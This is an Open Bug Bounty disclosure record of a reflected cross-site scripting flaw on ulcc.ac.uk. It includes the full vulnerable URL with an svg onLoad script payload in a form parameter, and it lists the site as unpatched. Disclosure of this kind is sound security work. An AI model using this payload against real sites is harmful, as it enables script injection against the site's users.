ulcc.ac.uk XSS vulnerability

2017-03-13T19:54:00
ID OBB:218747
Type openbugbounty
Reporter LewisWildgoose
Modified 2017-06-05T20:14:00

Description

Vulnerable URL:
http://www.ulcc.ac.uk/ulcc-bin/generic_form?AfterURL=http%3A%2F%2Fwww.london.ac.uk%2Findex.php%3Fid%3D344&deliverto;=osd%40london.ac.uk&_MailSubject=Course+booking+enquiry&_EmailCopy=y&_MailHead=Thank+you+for+your+course+enquiry%2Fbooking.+A+member+of+the+Staff+Development+Unit+will+contact+you+shortly+to+confirm+your+booking.+A+copy+of+your+original+enquiry%2Fbooking+is+provided+below%3A&_Required=%3CsvG%20onLoad=prompt%28%22OPENBUGBOUNTY%22%29%3E&Time;_Interested=&Reasons;_To_Attend=&How;_You_Apply_Skills=&Assisting;_In_Your_Role=&Special;_Needs=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 858368
VIP website status:| No
Check ulcc.ac.uk SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 March, 2017 19:54 GMT
Generic security notifications sent to website owner| 13 March, 2017 19:56 GMT
Vulnerability details disclosed by researcher| 5 June, 2017 20:14 GMT